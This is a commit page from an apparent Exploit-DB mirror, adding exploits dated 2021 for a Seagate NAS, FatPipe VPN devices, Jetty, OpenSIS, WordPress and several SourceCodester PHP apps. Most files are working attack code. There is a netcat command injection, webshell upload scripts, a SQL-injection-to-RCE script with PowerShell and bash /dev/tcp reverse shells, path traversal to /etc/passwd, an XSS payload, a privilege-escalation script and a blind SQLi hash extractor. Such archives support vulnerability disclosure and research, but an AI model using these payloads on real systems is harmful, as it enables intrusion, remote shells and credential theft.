bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions

DB: 2021-10-23

Browse source 
11 changes to exploits/shellcodes

Seagate BlackArmor NAS sg2000-2000.1331 - Command Injection

OpenSIS 8.0 'modname' - Directory Traversal

Patient Appointment Scheduler System 1.0 - Unauthenticated File Upload

Budget and Expense Tracker System 1.0 - Arbitrary File Upload
FatPipe Networks WARP/IPVPN/MPVPN 10.2.2 - Hidden Backdoor Account (Write Access)
FatPipe Networks WARP/IPVPN/MPVPN 10.2.2 - Remote Privilege Escalation

WordPress Plugin Redirect 404 to Parent 1.3.0 - Reflected Cross-Site Scripting
Jetty 9.4.37.v20210219 - Information Disclosure
Clinic Management System 1.0 - SQL injection to Remote Code Execution
Online Course Registration 1.0 - Blind Boolean-Based SQL Injection (Authenticated)

Windows/x64 - Reverse TCP (192.168.201.11:4444) Shellcode (330 Bytes)
This commit is contained in:
Offensive Security 2021-10-23 05:02:09 +00:00
parent ae2adf08f1
commit 4f2cf56b31
13 changed files with 1038 additions and 0 deletions
Show stats Download patch file Download diff file Expand all files Collapse all files

29
exploits/hardware/webapps/50132.py Executable file
View file

@ -0,0 +1,29 @@
# Exploit Title: Seagate BlackArmor NAS sg2000-2000.1331 - Command Injection
# Date: 15.07.2021
# Discovered by: Jeroen - IT Nerdbox
# Exploit Author: Metin Yunus Kandemir
# Version: sg2000-2000.1331
# Vendor Homepage: https://www.seagate.com/
# Software Link: https://www.seagate.com/tr/tr/support/downloads/item/banas-220-firmware-master-dl/
#!/usr/bin/python3
import requests
import sys
def exec(target, ncIp, ncPort):
print("[!] Please check netcat listener: "+ ncPort)
url = "http://" + target + "/backupmgt/localJob.php?session=fail;nc+"+ncIp+"+"+ncPort+"+-e+/bin/sh%00"
r = requests.get(url = url)
sys.exit(1)
def main(args):
if len(args) != 4:
print("[*] usage: %s targetIp:port ncIp ncPort" % (args[0]))
print("[*] Example:python3 exploit.py 192.168.1.13 192.168.1.22 80")
sys.exit(1)
exec(target=args[1], ncIp=args[2], ncPort=args[3])
if __name__ == "__main__":
main(args=sys.argv)

118
exploits/hardware/webapps/50341.txt Normal file
View file

@ -0,0 +1,118 @@
# Exploit Title: FatPipe Networks WARP/IPVPN/MPVPN 10.2.2 - Hidden Backdoor Account (Write Access)
# Date: 25.07.2021
# Exploit Author: LiquidWorm
# Vendor Homepage: https://www.fatpipeinc.com
FatPipe Networks WARP/IPVPN/MPVPN 10.2.2 Hidden Backdoor Account (Write Access)
Vendor: FatPipe Networks Inc.
Product web page: https://www.fatpipeinc.com
Affected version: WARP / IPVPN / MPVPN
10.2.2r38
10.2.2r25
10.2.2r10
10.1.2r60p82
10.1.2r60p71
10.1.2r60p65
10.1.2r60p58s1
10.1.2r60p58
10.1.2r60p55
10.1.2r60p45
10.1.2r60p35
10.1.2r60p32
10.1.2r60p13
10.1.2r60p10
9.1.2r185
9.1.2r180p2
9.1.2r165
9.1.2r164p5
9.1.2r164p4
9.1.2r164
9.1.2r161p26
9.1.2r161p20
9.1.2r161p17
9.1.2r161p16
9.1.2r161p12
9.1.2r161p3
9.1.2r161p2
9.1.2r156
9.1.2r150
9.1.2r144
9.1.2r129
7.1.2r39
6.1.2r70p75-m
6.1.2r70p45-m
6.1.2r70p26
5.2.0r34
Summary: FatPipe Networks invented the concept of router-clustering,
which provides the highest level of reliability, redundancy, and speed
of Internet traffic for Business Continuity and communications. FatPipe
WARP achieves fault tolerance for companies by creating an easy method
of combining two or more Internet connections of any kind over multiple
ISPs. FatPipe utilizes all paths when the lines are up and running,
dynamically balancing traffic over the multiple lines, and intelligently
failing over inbound and outbound IP traffic when ISP services and/or
components fail.
FatPipe IPVPN balances load and provides reliability among multiple
managed and CPE based VPNs as well as dedicated private networks. FatPipe
IPVPN can also provide you an easy low-cost migration path from private
line, Frame or Point-to-Point networks. You can aggregate multiple private,
MPLS and public networks without additional equipment at the provider's
site.
FatPipe MPVPN, a patented router clustering device, is an essential part
of Disaster Recovery and Business Continuity Planning for Virtual Private
Network (VPN) connectivity. It makes any VPN up to 900% more secure and
300% times more reliable, redundant and faster. MPVPN can take WANs with
an uptime of 99.5% or less and make them 99.999988% or higher, providing
a virtually infallible WAN. MPVPN dynamically balances load over multiple
lines and ISPs without the need for BGP programming. MPVPN aggregates up
to 10Gbps - 40Gbps of bandwidth, giving you all the reliability and speed
you need to keep your VPN up and running despite failures of service, line,
software, or hardware.
Desc: The application has a hidden administrative account 'cmuser' that has
no password and has write access permissions to the device. The user cmuser
is not visible in Users menu list of the application.
Tested on: Apache-Coyote/1.1
Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
@zeroscience
Advisory ID: ZSL-2021-5684
Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2021-5684.php
30.05.2016
25.07.2021
--
Overview:
FatPipe Central Manager is a secure web based solution providing a centralized solution
to manage FatPipe's suite of WAN reliability and optimization products. Central Manager
allows you to configure, manage and monitor FatPipe's patented MPSec technology at the
click of a button.
Central Manager = cmuser.
Once authenticated, you get admin rights.
HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Strict-Transport-Security: max-age=31536000
X-Frame-Options: DENY
X-Content-Type-Options: nosniff
X-XSS-Protection: 1; mode=block
Content-Type: application/json;charset=ISO-8859-1
Content-Length: 118
Date: Fri, 06 Aug 2017 16:37:07 GMT
Connection: close
{"loginRes":"success","userName":"userName","userAccess":"writeAccess","activeUserName":"cmuser","message":"noError"}

191
exploits/hardware/webapps/50342.py Executable file
View file

@ -0,0 +1,191 @@
# Exploit Title: FatPipe Networks MPVPN 10.2.2 - Remote Privilege Escalation
# Date: 25.07.2021
# Exploit Author: LiquidWorm
# Vendor Homepage: https://www.fatpipeinc.com
#!/usr/bin/env python3
#
#
# FatPipe Networks WARP/IPVPN/MPVPN 10.2.2 Remote Privilege Escalation
#
#
# Vendor: FatPipe Networks Inc.
# Product web page: https://www.fatpipeinc.com
# Affected version: WARP / IPVPN / MPVPN
# 10.2.2r38
# 10.2.2r25
# 10.2.2r10
# 10.1.2r60p82
# 10.1.2r60p71
# 10.1.2r60p65
# 10.1.2r60p58s1
# 10.1.2r60p58
# 10.1.2r60p55
# 10.1.2r60p45
# 10.1.2r60p35
# 10.1.2r60p32
# 10.1.2r60p13
# 10.1.2r60p10
# 9.1.2r185
# 9.1.2r180p2
# 9.1.2r165
# 9.1.2r164p5
# 9.1.2r164p4
# 9.1.2r164
# 9.1.2r161p26
# 9.1.2r161p20
# 9.1.2r161p17
# 9.1.2r161p16
# 9.1.2r161p12
# 9.1.2r161p3
# 9.1.2r161p2
# 9.1.2r156
# 9.1.2r150
# 9.1.2r144
# 9.1.2r129
# 7.1.2r39
# 6.1.2r70p75-m
# 6.1.2r70p45-m
# 6.1.2r70p26
# 5.2.0r34
#
# Summary: FatPipe Networks invented the concept of router-clustering,
# which provides the highest level of reliability, redundancy, and speed
# of Internet traffic for Business Continuity and communications. FatPipe
# WARP achieves fault tolerance for companies by creating an easy method
# of combining two or more Internet connections of any kind over multiple
# ISPs. FatPipe utilizes all paths when the lines are up and running,
# dynamically balancing traffic over the multiple lines, and intelligently
# failing over inbound and outbound IP traffic when ISP services and/or
# components fail.
#
# FatPipe IPVPN balances load and provides reliability among multiple
# managed and CPE based VPNs as well as dedicated private networks. FatPipe
# IPVPN can also provide you an easy low-cost migration path from private
# line, Frame or Point-to-Point networks. You can aggregate multiple private,
# MPLS and public networks without additional equipment at the provider's
# site.
#
# FatPipe MPVPN, a patented router clustering device, is an essential part
# of Disaster Recovery and Business Continuity Planning for Virtual Private
# Network (VPN) connectivity. It makes any VPN up to 900% more secure and
# 300% times more reliable, redundant and faster. MPVPN can take WANs with
# an uptime of 99.5% or less and make them 99.999988% or higher, providing
# a virtually infallible WAN. MPVPN dynamically balances load over multiple
# lines and ISPs without the need for BGP programming. MPVPN aggregates up
# to 10Gbps - 40Gbps of bandwidth, giving you all the reliability and speed
# you need to keep your VPN up and running despite failures of service, line,
# software, or hardware.
#
# Desc: The application suffers from a privilege escalation vulnerability.
# A normal user (group USER, 0) can elevate her privileges by sending a HTTP
# POST request and setting the JSON parameter 'privilege' to integer value
# '1' gaining administrative rights (group ADMINISTRATOR, 1).
#
# Tested on: Apache-Coyote/1.1
#
#
# Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
# @zeroscience
#
#
# Advisory ID: ZSL-2021-5685
# Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2021-5685.php
#
#
# 30.05.2016
# 25.07.2021
#
#
import sys
import time#######
import requests################
requests.packages.urllib3.disable_warnings()
if len(sys.argv) !=2:
print
print("********************************************************")
print("* *")
print("* Privilege escalation from USER to ADMINISTRATOR role *")
print("* in *")
print("* FatPipe WARP/IPVPN/MPVPN v10.2.2 *")
print("* *")
print("* ZSL-2021-5685 *")
print("* *")
print("********************************************************")
print("\n[POR] Usage: ./escalator.py [IP]")
sys.exit()
ajpi=sys.argv[1]
print
juzer=raw_input("[UNE] Username: ")
pasvord=raw_input("[UNE] Password: ")
sesija=requests.session()
logiranje={'loginParams':'{\"username\":\"'+juzer+'\",\"password\":\"'+pasvord+'\",\"authType\":0}'}
hederi={'Sec-Ch-Ua' :'\" Not A;Brand\";v=\"99\", \"Chromium\";v=\"92\"',
'Accept' :'application/json, text/javascript, */*; q=0.01',
'X-Requested-With':'XMLHttpRequest',
'Sec-Ch-Ua-Mobile':'?0',
'User-Agent' :'Fatnet/1.b',
'Content-Type' :'application/x-www-form-urlencoded; charset=UTF-8',
'Origin' :'https://'+ajpi,
'Sec-Fetch-Site' :'same-origin',
'Sec-Fetch-Mode' :'cors',
'Sec-Fetch-Dest' :'empty',
'Referer' :'https://'+ajpi+'/fpui/dataCollectionServlet',
'Accept-Encoding' :'gzip, deflate',
'Accept-Language' :'en-US,en;q=0.9',
'Connection' :'close'}
juarel1='https://'+ajpi+'/fpui/loginServlet'
alo=sesija.post(juarel1,headers=hederi,data=logiranje,verify=False)
if not 'success' in alo.text:
print('[GRE] Login error.')
sys.exit()
else:
print('[POR] Authentication successful.')
print('[POR] Climbing the ladder...')
sluba='''
|| || .--._
||====|| __ '---._)
|| ||"")\ Q Q )
||====|| =_/ o /
|| || | \_.-;-'-,._
||====|| | ' o---o )
|| || \ /H __H\ /
||====|| '-' \"")\/ |
|| || _ |_='-)_/
||====|| / '. )
|| || / /
||====|| |___/\| /
|| || |_| | |
||====|| / ) \\ \\
|| || (__/ \___\\
||====|| \_\\
|| || / )
||====|| (__/
'''
for k in sluba:
sys.stdout.write(k)
sys.stdout.flush()
time.sleep(0.01)
juarel2='https://'+ajpi+'/fpui/userServlet?loadType=set&block=userSetRequest'
posta={
'userList':'[{\"userName\":\"'+juzer+'\",\"oldUserName\":\"'+juzer+'\",\"privilege\":\"1\",\"password\":\"'+pasvord+'\",\"action\":\"edit\",\"state\":false}]'
}
stanje=sesija.post(juarel2,headers=hederi,data=posta,verify=False)
if not 'true' in stanje.text:
print('\n[GRE] Something\'s fishy!')
sys.exit()
else:
print('\n[POR] You are now authorized not only to view settings, but to modify them as well. Yes indeed.')
sys.exit()

20
exploits/java/webapps/50438.txt Normal file
View file

@ -0,0 +1,20 @@
# Exploit Title: Jetty 9.4.37.v20210219 - Information Disclosure
# Date: 2021-10-21
# Exploit Author: Mayank Deshmukh
# Vendor Homepage: https://www.eclipse.org/jetty/
# Software Link: https://repo1.maven.org/maven2/org/eclipse/jetty/jetty-distribution/9.4.37.v20210219/
# Version: 9.4.37.v20210219 and 9.4.38.v20210224
# Tested on: Kali Linux
# CVE : CVE-2021-28164
POC #1 - web.xml
GET /%2e/WEB-INF/web.xml HTTP/1.1
Host: localhost:8080
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1
Cache-Control: max-age=0

22
exploits/php/webapps/50259.txt Normal file
View file

@ -0,0 +1,22 @@
# Exploit Title: OpenSIS 8.0 'modname' - Directory/Path Traversal
# Date: 09-02-2021
# Exploit Author: Eric Salario
# Vendor Homepage: http://www.os4ed.com/
# Software Link: https://opensis.com/download
# Version: 8.0
# Tested on: Windows, Linux
# CVE: CVE-2021-40651
The 'modname' parameter in the 'Modules.php' is vulnerable to local file inclusion vulnerability. This vulnerability can be exploited to expose sensitive information from arbitrary files in the underlying system.
To exploit the vulnerability, someone must login as the "Parent" user, navigate to http://localhost/Modules.php?modname=miscellaneous%2fPortal.php. The 'modname' parameter and requests the Portal.php's contents. By going back a few directory using '..%2f' decoded as '../' it was possible to disclose arbitrary file from the server's filesystem as long as the application has access to the file.
1. Login as "Parent"
2. Open a web proxy such as BurpSuite and capture the requests
3. Navigate to http://localhost/Modules.php?modname=miscellaneous%2fPortal.php..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd&failed_login=
4. Check the response
PoC: https://youtu.be/wFwlbXANRCo

78
exploits/php/webapps/50264.py Executable file
View file

@ -0,0 +1,78 @@
# Exploit Title: Patient Appointment Scheduler System 1.0 - Unauthenticated File Upload
# Date: 03/09/2021
# Exploit Author: a-rey
# Vendor Homepage: https://www.sourcecodester.com/php/14928/patient-appointment-scheduler-system-using-php-free-source-code.html
# Software Link: https://www.sourcecodester.com/download-code?nid=14928
# Version: v1.0
# Tested on: Ubuntu 20.04.3 LTS (Focal Fossa) with XAMPP 8.0.10-0
# Exploit Write-Up: https://github.com/a-rey/exploits/blob/main/writeups/Patient_Appointment_Scheduler_System/v1.0/writeup.md
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
import os
import time
import logging
import requests
import argparse
BANNER = """
Patient Appointment Scheduler System v1.0 - Unauthenticated File Upload & Remote Code Execution
by: \033[0m\033[1;31m \033[0m
\033[0m\033[1;32m \033[0m
\033[0m\033[1;33m \033[0m
\033[0m\033[1;34m \033[0m
\033[0m\033[1;35m \033[0m
\033[0m\033[1;36m \033[0m
"""
def exploit(url:str, file:str, delay:int) -> None:
if not os.path.exists(file):
logging.error(f'webshell payload "{file}"" does not exist?')
return
logging.info(f'uploading webshell payload "{os.path.basename(file)}" to {url}/uploads ...')
uploadTime = int(time.time())
r = requests.post(url + '/classes/SystemSettings.php',
files={'img' : (os.path.basename(file), open(file, 'rb'))}, # NOTE: can also use 'cover' field, but this is more inconspicuous
params={'f' : 'update_settings'},
verify=False
)
if not r.ok:
logging.error('HTTP upload request failed')
return
logging.info(f'finding new payload file name on target (+/- {delay} seconds) ...')
for i in range(uploadTime - delay, uploadTime + delay + 1):
r = requests.get(url + f'/uploads/{str(i)}_{os.path.basename(file)}', allow_redirects=False)
logging.debug(f'trying {url}/uploads/{str(i)}_{os.path.basename(file)} ...')
# NOTE: website will send redirects for all files that do not exist
if r.status_code != 302:
logging.success(f'webshell payload found on target at {url}/uploads/{str(i)}_{os.path.basename(file)}')
return
logging.error('failed to find payload on target')
logging.warning('maybe need a larger delay or uploads directory is not writable?')
return
if __name__ == '__main__':
# parse arguments
parser = argparse.ArgumentParser(formatter_class=argparse.RawDescriptionHelpFormatter, usage=BANNER)
parser.add_argument('-u', '--url', help='website URL', type=str, required=True)
parser.add_argument('-p', '--payload', help='PHP webshell file to upload', type=str, required=True)
parser.add_argument('-d', '--delay', help='delay (seconds) for file timestamp in payload name on target', type=int, required=False, default=60)
parser.add_argument('--debug', help='enable debugging output', action='store_true', default=False)
args = parser.parse_args()
# define logger
logging.basicConfig(format='[%(asctime)s][%(levelname)s] %(message)s', datefmt='%d %b %Y %H:%M:%S', level='INFO' if not args.debug else 'DEBUG')
logging.SUCCESS = logging.CRITICAL + 1
logging.addLevelName(logging.SUCCESS, '\033[0m\033[1;32mGOOD\033[0m')
logging.addLevelName(logging.ERROR, '\033[0m\033[1;31mFAIL\033[0m')
logging.addLevelName(logging.WARNING, '\033[0m\033[1;33mWARN\033[0m')
logging.addLevelName(logging.INFO, '\033[0m\033[1;36mINFO\033[0m')
logging.success = lambda msg, *args: logging.getLogger(__name__)._log(logging.SUCCESS, msg, args)
# print banner
print(BANNER)
# run exploit
exploit(args.url, args.payload, args.delay)

52
exploits/php/webapps/50326.txt Normal file
View file

@ -0,0 +1,52 @@
# Exploit Title: Budget and Expense Tracker System 1.0 - Arbitrary File Upload
# Exploit Author: ()t/\/\1
# Date: 23/09/2021
# Vendor Homepage: https://www.sourcecodester.com/php/14893/budget-and-expense-tracker-system-php-free-source-code.html
# Tested on: Linux
# Version: 2.0
# Exploit Description:
The application is prone to an arbitrary file-upload because it fails to adequately sanitize user-supplied input. An attacker can exploit these issues to upload arbitrary files in the context of the web server process and execute commands.
# PoC request
POST /expense_budget/classes/Users.php?f=save HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://localhost/expense_budget/admin/?page=user
X-Requested-With: XMLHttpRequest
Content-Type: multipart/form-data; boundary=---------------------------1399170066243244238234165712
Content-Length: 824
Connection: close
Cookie: PHPSESSID=a36f66fa4a5751d4a15db458d573139c
-----------------------------1399170066243244238234165712
Content-Disposition: form-data; name="id"
1
-----------------------------1399170066243244238234165712
Content-Disposition: form-data; name="firstname"
A
-----------------------------1399170066243244238234165712
Content-Disposition: form-data; name="lastname"
a
-----------------------------1399170066243244238234165712
Content-Disposition: form-data; name="username"
admin
-----------------------------1399170066243244238234165712
Content-Disposition: form-data; name="password"
-----------------------------1399170066243244238234165712
Content-Disposition: form-data; name="img"; filename="na3na3.php"
Content-Type: image/jpeg
<?php echo "<pre>";system($_GET['cmd']); ?>
-----------------------------1399170066243244238234165712--

13
exploits/php/webapps/50350.txt Normal file
View file

@ -0,0 +1,13 @@
# Exploit Title: WordPress Plugin Redirect 404 to Parent 1.3.0 - Reflected Cross-Site Scripting (XSS)
# Date: 2/3/2021
# Author: 0xB9
# Software Link: https://downloads.wordpress.org/plugin/redirect-404-to-parent.1.3.0.zip
# Version: 1.3.0
# Tested on: Windows 10
# CVE: CVE-2021-24286
1. Description:
This plugin redirects any 404 request to the parent URL. The tab parameter in the Admin Panel is vulnerable to XSS.
2. Proof of Concept:
wp-admin/options-general.php?page=moove-redirect-settings&tab="+style=animation-name:rotation+onanimationstart="alert(/XSS/);

98
exploits/php/webapps/50439.py Executable file
View file

@ -0,0 +1,98 @@
# Exploit Title: Clinic Management System 1.0 - SQL injection to Remote Code Execution
# Date:21/10/2021
# Exploit Author: Pablo Santiago
# Vendor Homepage: https://www.sourcecodester.com/php/14243/open-source-clinic-management-system-php-full-source-code.html
# Software Link: https://www.sourcecodester.com/sites/default/files/download/Nikhil_B/clinic-full-source-code-with-database_0.zip
# Version: 1.0
# Tested on: Windows 7 and Ubuntu 21.10
# References: https://medium.com/@Pablo0xSantiago/clinic-management-system-1-0-sql-injection-bypass-to-remote-code-execution-804bceac037e
# Vulnerability: Through SQL injection to bypass the login form it is
possible to upload a malicious file and after use that malicious file to
execute code in the remote system.
# Proof of Concept:
import requests
import sys
import time
session = requests.Session()
#http_proxy = "http://127.0.0.1:8080"
#https_proxy = "https://127.0.0.1:8080"
#proxyDict = {"http" : http_proxy,
# "https" : https_proxy}
def windows(HPW,host,shell_name):
payload =
"""powershell+-nop+-c+"$client+%3d+New-Object+System.Net.Sockets.TCPClient("""+HPW+""")%3b$stream+%3d+$client.GetStream()%3b[byte[]]$bytes+%3d+0..65535|%25{0}%3bwhile(($i+%3d+$stream.Read($bytes,+0,+$bytes.Length))+-ne+0){%3b$data+%3d+(New-Object+-TypeName+System.Text.ASCIIEncoding).GetString($bytes,0,+$i)%3b$sendback+%3d+(iex+$data+2>%261+|+Out-String+)%3b$sendback2+%3d+$sendback+%2b+'PS+'+%2b+(pwd).Path+%2b+'>+'%3b$sendbyte+%3d+([text.encoding]%3a%3aASCII).GetBytes($sendback2)%3b$stream.Write($sendbyte,0,$sendbyte.Length)%3b$stream.Flush()}%3b$client.Close()"""""
host2 = host+'/'+'uploadImage/Logo/' + shell_name + '.php?cmd='+payload
#print(payload)
try:
request_rce = requests.get(host2,timeout=8)
except requests.exceptions.ReadTimeout:
pass
def linux(HPL,host,shell_name):
payload = 'bash+-c+"bash+-i+>%26+/dev/tcp/'+HPL+'+0>%261"'
host2 = host+'/'+'/uploadImage/Logo/' + shell_name + '.php?cmd='+payload
#print(payload)
try:
request_rce = requests.get(host2,timeout=8)
except requests.exceptions.ReadTimeout:
pass
def main():
host = sys.argv[1]
shell_name = sys.argv[2]
url = host + '/login.php'
values = {'user': "admin",
'email': "' OR 1 -- -",
'password': '',
'btn_login': ""
}
r = session.post(url, data=values)
cookie = session.cookies.get_dict()['PHPSESSID']
data = { 'btn_web':''}
headers= {'Cookie': 'PHPSESSID='+cookie}
request = session.post(host+ '/manage_website.php', data=data,
headers=headers,files={"website_image":(shell_name+'.php',"<?=`$_GET[cmd]`?>")})
print("")
print('[*] Your Simple Webshell was uploaded to ' + host +
'/uploadImage/Logo/' + shell_name + '.php' )
print("")
LHOST = input('[+] Enter your LHOST: ')
LPORT = input('[+] Enter your LPORT: ')
print("")
HPW= "'"+LHOST+"'"+','+LPORT
HPL= ""+LHOST+""+'/'+LPORT
print('[+] Option 1: Windows')
print('[+] Option 2: Linux')
option = input('[+] Choose OS: ')
if option == "1":
windows(HPW,host,shell_name)
exit()
elif option == "2":
linux(HPL,host,shell_name)
exit()
else:
print("Please choose Windows or Linux")
main()
#Usage: python3 host shell_name
#Example: python3 http://localhost/clinic shell

116
exploits/php/webapps/50440.txt Normal file
View file

@ -0,0 +1,116 @@
# Exploit Title: Online Course Registration 1.0 - Blind Boolean-Based SQL Injection (Authenticated)
# Exploit Author: Sam Ferguson (@AffineSecurity) and Drew Jones (@qhum7sec)
# Date: 2021-10-21
# Vendor Homepage: https://www.sourcecodester.com/php/14251/online-course-registration.html
# Software Link: https://www.sourcecodester.com/sites/default/files/download/razormist/online-course-registration.zip
# Version: 1.0
# Tested On: Windows 10 + XAMPP + Python 3
# Vulnerability: An attacker can perform a blind boolean-based SQL injection attack, which can provide attackers
# with access to the username and md5 hash of any administrators.
# Vulnerable file: /online-course-registration/Online/pincode-verification.php
# Proof of Concept:
#!/usr/bin/python3
import requests
import sys
import string
def exploit(hostname, username, password):
# Building bruteforce list
pass_list = list(string.ascii_lowercase)
pass_list += list(range(0,10))
pass_list = map(str, pass_list)
pass_list = list(pass_list)
user_list = pass_list
user_list += list(string.ascii_uppercase)
user_list = map(str, user_list)
user_list = list(user_list)
session = requests.Session()
# This URL may change based on the implementation - change as needed
url = f"{hostname}/online-course-registration/Online/index.php"
headers = {"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:93.0) Gecko/20100101 Firefox/93.0", "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8", "Accept-Language": "en-CA,en-US;q=0.7,en;q=0.3", "Accept-Encoding": "gzip, deflate", "Content-Type": "application/x-www-form-urlencoded", "Origin": "http://127.0.0.1", "Connection": "close", "Referer": "http://127.0.0.1/online-course-registration/Online/index.php", "Upgrade-Insecure-Requests": "1", "Sec-Fetch-Dest": "document", "Sec-Fetch-Mode": "navigate", "Sec-Fetch-Site": "same-origin", "Sec-Fetch-User": "?1"}
data = {"regno": f"{username}", "password": f"{password}", "submit": ''}
r = session.post(url, headers=headers, data=data)
print("Admin username:")
# This range number is pretty arbitrary, so change it to whatever you feel like
for i in range(1,33):
counter = 0
find = False
for j in user_list:
# This URL may change based on the implementation - change as needed
url = f"{hostname}/online-course-registration/Online/pincode-verification.php"
headers = {"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:93.0) Gecko/20100101 Firefox/93.0", "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8", "Accept-Language": "en-CA,en-US;q=0.7,en;q=0.3", "Accept-Encoding": "gzip, deflate", "Content-Type": "application/x-www-form-urlencoded", "Origin": "http://127.0.0.1", "Connection": "close", "Referer": "http://127.0.0.1/online-course-registration/Online/pincode-verification.php", "Upgrade-Insecure-Requests": "1", "Sec-Fetch-Dest": "document", "Sec-Fetch-Mode": "navigate", "Sec-Fetch-Site": "same-origin", "Sec-Fetch-User": "?1"}
data = {"pincode": f"' or (select(select (substring(username,{i},1)) from admin) = \"{j}\") -- - #", "submit": ''}
a = session.post(url, headers=headers, data=data)
counter += 1
if 'Course Enroll' in a.text:
sys.stdout.write(j)
sys.stdout.flush()
break
elif counter == len(user_list):
find = True
break
if find:
break
print("\n")
print("Admin password hash:")
# This range is not arbitrary and will cover md5 hashing - if the hashing implementation is different, change as needed
for i in range(1,33):
counter = 0
find = False
for j in pass_list:
url = f"{hostname}/online-course-registration/Online/pincode-verification.php"
headers = {"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:93.0) Gecko/20100101 Firefox/93.0", "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8", "Accept-Language": "en-CA,en-US;q=0.7,en;q=0.3", "Accept-Encoding": "gzip, deflate", "Content-Type": "application/x-www-form-urlencoded", "Origin": "http://127.0.0.1", "Connection": "close", "Referer": "http://127.0.0.1/online-course-registration/Online/pincode-verification.php", "Upgrade-Insecure-Requests": "1", "Sec-Fetch-Dest": "document", "Sec-Fetch-Mode": "navigate", "Sec-Fetch-Site": "same-origin", "Sec-Fetch-User": "?1"}
data = {"pincode": f"' or (select(select (substring(password,{i},1)) from admin) = \"{j}\") -- - #", "submit": ''}
a = session.post(url, headers=headers, data=data)
counter += 1
if 'Course Enroll' in a.text:
sys.stdout.write(j)
sys.stdout.flush()
break
elif counter == len(pass_list):
find = True
break
if find:
break
print("\n\nSuccessfully pwnd :)")
def logo():
art = R'''
__/\\\\\\\\\\\\\____/\\\\\\\\\\\__/\\\\\_____/\\\__/\\\\_________/\\\__
_\/\\\/////////\\\_\/////\\\///__\/\\\\\\___\/\\\_\///\\________\/\\\__
_\/\\\_______\/\\\_____\/\\\_____\/\\\/\\\__\/\\\__/\\/_________\/\\\__
_\/\\\\\\\\\\\\\/______\/\\\_____\/\\\//\\\_\/\\\_\//___________\/\\\__
_\/\\\/////////________\/\\\_____\/\\\\//\\\\/\\\__________/\\\\\\\\\__
_\/\\\_________________\/\\\_____\/\\\_\//\\\/\\\_________/\\\////\\\__
_\/\\\_________________\/\\\_____\/\\\__\//\\\\\\________\/\\\__\/\\\__
_\/\\\______________/\\\\\\\\\\\_\/\\\___\//\\\\\________\//\\\\\\\/\\_
_\///______________\///////////__\///_____\/////__________\///////\//__
'''
info = 'CVE-2021-37357 PoC'.center(76)
credits = 'Created by @AffineSecurity and @qhum7sec'.center(76)
print(f"{art}\n{info}\n{credits}")
def main():
logo()
hostname = sys.argv[1]
username = sys.argv[2]
password = sys.argv[3]
if len(sys.argv) != 4:
print("Usage: python3 exploit.py http://127.0.0.1:80 username password")
exploit(hostname, username, password)
if __name__ == '__main__':
main()

10
files_exploits.csv
View file

@ -44182,6 +44182,7 @@ id,file,description,date,author,type,platform,port
50123,exploits/php/webapps/50123.py,"Garbage Collection Management System 1.0 - SQL Injection + Arbitrary File Upload",1970-01-01,"Luca Bernardi",webapps,php,
50128,exploits/php/webapps/50128.py,"osCommerce 2.3.4.1 - Remote Code Execution (2)",1970-01-01,"Bryan Leong",webapps,php,
50129,exploits/php/webapps/50129.py,"WordPress Plugin Popular Posts 5.3.2 - Remote Code Execution (RCE) (Authenticated)",1970-01-01,"Simone Cristofaro",webapps,php,
50132,exploits/hardware/webapps/50132.py,"Seagate BlackArmor NAS sg2000-2000.1331 - Command Injection",1970-01-01,"Metin Yunus Kandemir",webapps,hardware,
50137,exploits/php/webapps/50137.txt,"WordPress Plugin LearnPress 3.2.6.7 - 'current_items' SQL Injection (Authenticated)",1970-01-01,nhattruong,webapps,php,
50138,exploits/php/webapps/50138.txt,"WordPress Plugin LearnPress 3.2.6.8 - Privilege Escalation",1970-01-01,nhattruong,webapps,php,
50139,exploits/php/webapps/50139.txt,"WordPress Plugin Mimetic Books 0.2.13 - 'Default Publisher ID field' Stored Cross-Site Scripting (XSS)",1970-01-01,"Vikas Srivastava",webapps,php,
@ -44264,9 +44265,11 @@ id,file,description,date,author,type,platform,port
50256,exploits/php/webapps/50256.txt,"WordPress Plugin Duplicate Page 4.4.1 - Stored Cross-Site Scripting (XSS)",1970-01-01,"Nikhil Kapoor",webapps,php,
50254,exploits/hardware/webapps/50254.txt,"Compro Technology IP Camera - ' mjpegStreamer.cgi' Screenshot Disclosure",1970-01-01,icekam,webapps,hardware,
50255,exploits/multiple/webapps/50255.txt,"WPanel 4.3.1 - Remote Code Execution (RCE) (Authenticated)",1970-01-01,Sentinal920,webapps,multiple,
50259,exploits/php/webapps/50259.txt,"OpenSIS 8.0 'modname' - Directory Traversal",1970-01-01,"Eric Salario",webapps,php,
50260,exploits/php/webapps/50260.txt,"OpenEMR 6.0.0 - 'noteid' Insecure Direct Object Reference (IDOR)",1970-01-01,"Allen Enosh Upputori",webapps,php,
50262,exploits/php/webapps/50262.py,"FlatCore CMS 2.0.7 - Remote Code Execution (RCE) (Authenticated)",1970-01-01,"Mason Soroka-Gill",webapps,php,
50263,exploits/php/webapps/50263.txt,"Bus Pass Management System 1.0 - 'viewid' Insecure direct object references (IDOR)",1970-01-01,sudoninja,webapps,php,
